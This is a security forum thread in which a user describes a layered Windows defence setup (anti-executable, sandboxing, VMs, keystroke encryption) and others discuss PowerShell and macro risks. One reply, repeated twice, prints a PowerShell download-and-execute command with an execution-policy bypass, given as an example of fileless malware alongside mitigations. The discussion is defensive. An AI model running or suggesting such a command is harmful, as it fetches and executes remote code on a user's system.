- Feb 10, 2012
- 585
Updated from 413 to 483 build long time ago just upload info here 
Quassar - Desktop PC
- Thread starter Quassar
- Start date
- Jul 1, 2017
- 1,396
- Feb 10, 2012
- 585
Droped SpyShelterFW becasue it's made me some incompatibility issues with few programs and games.
As alternative i added bundle from scotty: Winpatrol Plus, WAR and Firewall
Firewall which is more advanced/detalied and have log connection, while SS dont have it yet....
SRP techniques i have in AppGuard which for me are also more advanced.
Keystore encryption now i have from ZemanaAL so i turned zemana from o/d to real time
Cons is only "HIPS swaped to Anti-exe" but with solid HIDS
plus WinAntiRansom but it will dont have much job to do while AppGuard work in background at last i have nice access file/folder log history
Imgur: The most awesome images on the Internet
As alternative i added bundle from scotty: Winpatrol Plus, WAR and Firewall
Firewall which is more advanced/detalied and have log connection, while SS dont have it yet....
SRP techniques i have in AppGuard which for me are also more advanced.
Keystore encryption now i have from ZemanaAL so i turned zemana from o/d to real time
Cons is only "HIPS swaped to Anti-exe" but with solid HIDS
plus WinAntiRansom but it will dont have much job to do while AppGuard work in background at last i have nice access file/folder log history
Imgur: The most awesome images on the Internet
Last edited:
- Feb 10, 2012
- 585
Nah no need i have 32GB rams on this machine no need molest disk... i never yet had BSOD with windows 10 so no need log to read issue.Please enable pagefile.
- Feb 10, 2012
- 585
Updates:
System Build to lates 15063.632
VMware Workstation from 12 to 14
Sandboxie from stable 5.20 to lates beta 5.21.4
System Build to lates 15063.632
VMware Workstation from 12 to 14
Sandboxie from stable 5.20 to lates beta 5.21.4
- Dec 23, 2014
- 8,119
Very nice, advanced and flexible setup. Thanks for sharing.
I have 3 questions.
Did you disabled java or javascript?
What method you applied to disable powershell?
How do you protect the system against VBA macros, and other embeded malicious content?
I have 3 questions.
Did you disabled java or javascript?
What method you applied to disable powershell?
How do you protect the system against VBA macros, and other embeded malicious content?
Last edited:
- Dec 23, 2014
- 8,119
This setup can be very strong when used by an experienced user, like @Quassar. I use a very similar, default deny SRP setup, with Windows Defender and forced SmartScreen (instead of Zemana AntiLogger, Malwarebytes v3, and the standard SmartScreen). AppGuard can easily stop/mitigate most of the 0-day malware files, but I am not sure if it can stop the below fileless PowerShell example (embedded in a Word document macro):
powershell.exe -ExecutionPolicy bypass -noprofile -command "iex(New-Object Net.WebClient).DownloadString('httxx://raw.githubusercontent.com/AndyFul/Hard_Configurator---old-versions/master/Helloworld.ps1')"
Yet, if not so, then in most cases the malware can be stopped on the later infection stage or finally by Shadow Defender. Anyway, the above PowerShell example (and most penetration PowerShell tools) can be stopped by setting Constrained Language mode.
The second problem for an inexperienced user, may be installing the software. Malwarebytes has only the signatures of the recent malware, so the user can infect himself when executing the older installation files (when ignored by SmartScreen).
SmartScreen has known limitations, when the files come from: pendrives (FAT32), memory cards, DVDs, ISO images, *.arj, *.7z (and other containers), or are downloaded by using download managers (accelerators).
The third problem, can arise when the inexperienced user plays with malware (cracks, keygens), assuming that he/she is safe using Shadow Defender. It should be remembered, that in the case of the worms, they can infect easily the home network members and compromise the Internet connection.
There may be some additional, small security loopholes, but none of them should be a serious problem for the experienced user.
Edit
I noticed that Malwarebytes v3 made significant slowdowns on starting some programs in Sandboxie.
powershell.exe -ExecutionPolicy bypass -noprofile -command "iex(New-Object Net.WebClient).DownloadString('httxx://raw.githubusercontent.com/AndyFul/Hard_Configurator---old-versions/master/Helloworld.ps1')"
Yet, if not so, then in most cases the malware can be stopped on the later infection stage or finally by Shadow Defender. Anyway, the above PowerShell example (and most penetration PowerShell tools) can be stopped by setting Constrained Language mode.
The second problem for an inexperienced user, may be installing the software. Malwarebytes has only the signatures of the recent malware, so the user can infect himself when executing the older installation files (when ignored by SmartScreen).
SmartScreen has known limitations, when the files come from: pendrives (FAT32), memory cards, DVDs, ISO images, *.arj, *.7z (and other containers), or are downloaded by using download managers (accelerators).
The third problem, can arise when the inexperienced user plays with malware (cracks, keygens), assuming that he/she is safe using Shadow Defender. It should be remembered, that in the case of the worms, they can infect easily the home network members and compromise the Internet connection.
There may be some additional, small security loopholes, but none of them should be a serious problem for the experienced user.
Edit
I noticed that Malwarebytes v3 made significant slowdowns on starting some programs in Sandboxie.
Last edited:
- Feb 10, 2012
- 585
Test it in VMware Workstation
So infection need bypass
1)VMware
2a)HIPS & HIDS + 2 other SRP
2b)Antyvirus + 2 scanners
2c)Windows builded security + hardering which i dont at all trust but any way nice to have not default naked system
Addional
3a )And at last it will work tempolary to next reboot so need bypas SD too if wanna encrypt or modify my files permanently.
3b)If virus its keylogger need bypass keyencryption from zemana.
4) i have 2 PCs and to be "Seriously" donno how about you but i dont login to bank from malware lab pc
- Dec 23, 2014
- 8,119
You are secure because you are an experienced user. The inexperienced user will infect himself simply, by ignoring all security alerts, when installing an application (with malware) from a friend's pendrive (he will assume that it is clean).Test it in VMware Workstation
So infection need bypass
1)VMware
2a)HIPS & HIDS + 2 other SRP
2b)Antyvirus + 2 scanners
2c)Windows builded security + hardering which i dont at all trust but any way nice to have not default naked system
Addional
3a )And at last it will work tempolary to next reboot so need bypas SD too if wanna encrypt or modify my files permanently.
3b)If virus its keylogger need bypass keyencryption from zemana.
4) i have 2 PCs and to be "Seriously" donno how about you but i dont login to bank from malware lab pc
Strong security for an experienced user, can be useless for the inexperienced one.
Thanks for sharing your setup, there are many experienced users here.
- Feb 10, 2012
- 585
Yea that is true long time ago when i worked in pc sevice i had so much pc's infected with solid anti-virus installed on it which it could easy delete popular infection but didn't cause user added it to safelist becaue on xxx foum smb wrote is trusted cracker - source^^
- Dec 23, 2014
- 8,119
Ha, ha. They did not use BitDefender free.
Using the default policies, an in-memory powershell script will run with restricted privileges.
The best protection against powershell disaster is to disable powershell and system.management.automation.dll. These policies also cover custom\wrapped powershell executables and .dll.
Last edited by a moderator:
- Dec 23, 2014
- 8,119
More about PowerShell protection:
How-to Guide - How do you secure PowerShell?
How-to Guide - How do you secure PowerShell?
- Nov 17, 2016
- 1,242
Why have both Adguard and Hostsman? There doesn't seem much frequent extra coverage from the addition. The only thing that should be common are from ubiquitous sites like Google, Facebook and some lesser sites like Amazon and Twitter. Stuff such as those in uBlock Privacy list like
Last edited:
- Nov 17, 2016
- 1,242
I have the best solution of all.
Powershell in its entire monstrosity should not be shipped by default with Windows; it should be a user opt-in, manual, standalone installation. Making it such pretty much means only those that actually need and use it - like enterprise Admins - will install it.
It makes no sense that Microsoft ships it, but at the same time advises everyone that does not need it to disable it.
As long as the users continue to allow Microsoft to ram things down their throats that greatly increase the risk of system compromise, Microsoft will continue to do it.
Who is responsible for the mess that is Windows ? Microsoft. And 3rd parties have to fix that mess the best that they can with what they have.
- Dec 23, 2014
- 8,119
Bash is another similar problem. Actually, both PowerShell and Bash can be installed by the malware on the target computer, using the remote server. So, even uninstalling PowerShell would not be bulletproof. The Pandora's box is already opened.
Windows is the great example, that something universally useful cannot be safe (Enterprises, administrators, home users, local networks, Active Directory Domains, Internet, many protocols, backward compatibility, several OS shells, remote access, sharing, and much more).
Last edited:
- Feb 10, 2012
- 585
Changed OS malware testing to NO becasue i test it on separate PC/Rasberry which is not connected with rest of my house devices
- Dec 23, 2014
- 8,119
So, are you using the separate router too for maximum security?Changed OS malware testing to NO becasue i test it on separate PC/Rasberry which is not connected with rest of my house devices
- Feb 10, 2012
- 585
Its it not even conected...
Rasberry i use to emulate fake netowork(DNS) to catch outgoing singal
Rasberry i use to emulate fake netowork(DNS) to catch outgoing singal